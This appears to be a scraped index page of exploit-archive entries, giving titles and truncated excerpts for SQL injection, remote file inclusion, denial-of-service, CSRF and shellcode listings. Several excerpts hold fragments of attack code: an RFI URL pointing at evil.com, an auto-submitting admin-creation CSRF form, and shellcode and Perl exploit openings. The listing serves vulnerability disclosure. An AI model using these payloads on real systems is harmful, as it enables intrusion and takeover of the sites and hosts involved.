Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...

Ipswitch WhatsUp Professional 2006 Remote Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. This issue allows remo...

Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability

No description provided by source. Discovered by: kerem125 & gsy Website: http://www.kerem125.com/ & http://www.by-gsy.org/ Script download: http://download.asprehberi.net/dosyalar/kategoriler/alisveris/freepaypalshoppingcarttr.zip Exploit:...

PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)

No description provided by source. / Fixed Exploit against PoPToP in Linux poptop-sane.c ./r4nc0rwh0r3 of blightninjas [email protected] blightninjas: bringing pain, suffering, and humiliation to the security world Expect more great release like helloworld-annotated.c and cd explained...

NoticeWare Email Server 4.6 NG LOGIN Messages Denial Of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/30605/info NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input. Remote attackers can exploit this issue to deny service to legitimate users. NoticeWare...

iOS Serversman 3.1.5 - HTTP Remote DoS Exploit

No description provided by source. !/usr/bin/python Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit Found by: Steven Seeley mrme seeleymagic at hotmail dot com Homepage: http://serversman.com/indexen.jsp Download: From the app store Free - use your Itunes account Tested on: Iphone 3G...

PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/713/info The PHP/FI package which was originally written by Rasmus Lerdorf is an is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features...

Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects Campsite 2.6.1. Earlier...

webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV3 print \n \'/ ; print \n -.- ; print \n -------------------oOO------OOo--------------------; print \n | webSPELL = v4.01.02 Multiple Remote SQL Injection |; print \n | coded by DNX |; print \n...

WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection

No description provided by source. Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection Date: 7/2/12 Exploit Author: Chris Kellum Vendor Homepage: http://www.moodthingy.com/ Software Link: http://downloads.wordpress.org/plugin/moodthingy-mood-rating-widget.0.8.7.zip...

Nero Express 7.9.6.4 - Local Heap PoC

No description provided by source. !/user/bin/perl Exploit Title: Nero Express7 Local Heap Poc Date: 2010/01/01 Author: D3V!L FUCKER Version: Nero Express7 Ver.7.9.6.4 Tested on: windows vista sp0 After Setup Open Nero StartSmart Essentials = Favorites = Open Projects = explit.nir Code : $headr=...

BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8938/info It has been reported that BEA WebLogic InteractiveQuery.jsp example application is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied dat...

68kb Knowledge Base 1.0.0rc3 - Admin CSRF

No description provided by source. Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF Date: 2010-04-02 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip Version: v1.0.0rc3 html body onload=document.formsedit.submit form name=creat...

Mongoose 2.8 Space String Remote File Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/38145/info Mongoose is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view the source code of files in the context ...

Joomla Component com_start SQL Injection Vulnerability

No description provided by source. InformatioN Title : Joomla Component comstart SQL Injection Vulnerability Author : DevilZ TM By D3v1l Homepage : http://www.DEVILZTM.com Contact : [email protected] & [email protected] ExploiT Vulnerable File :...

Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/39867/info Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...

Solaris/x86 - Remote Download file - 79 bytes

No description provided by source. / Title: Solaris/x86 - Remote Download file - 79 bytes Author: Jonathan Salwan submit ! shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes http://www.shell-storm.org/shellcode/ Date: 2010-05-25...

CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...

Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure

No description provided by source. source: http://www.securityfocus.com/bid/4877/info Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation. When Apache Tomcat is installed with a default configuration, several example files are also installed. When some ...

Linux/x86 Remote Port Forwarding Shellcode 87 bytes

No description provided by source. / Linux/x86 Remote Port forwarding 87 bytes ssh -R 9999:localhost:22 192.168.0.226 Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom / xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 push...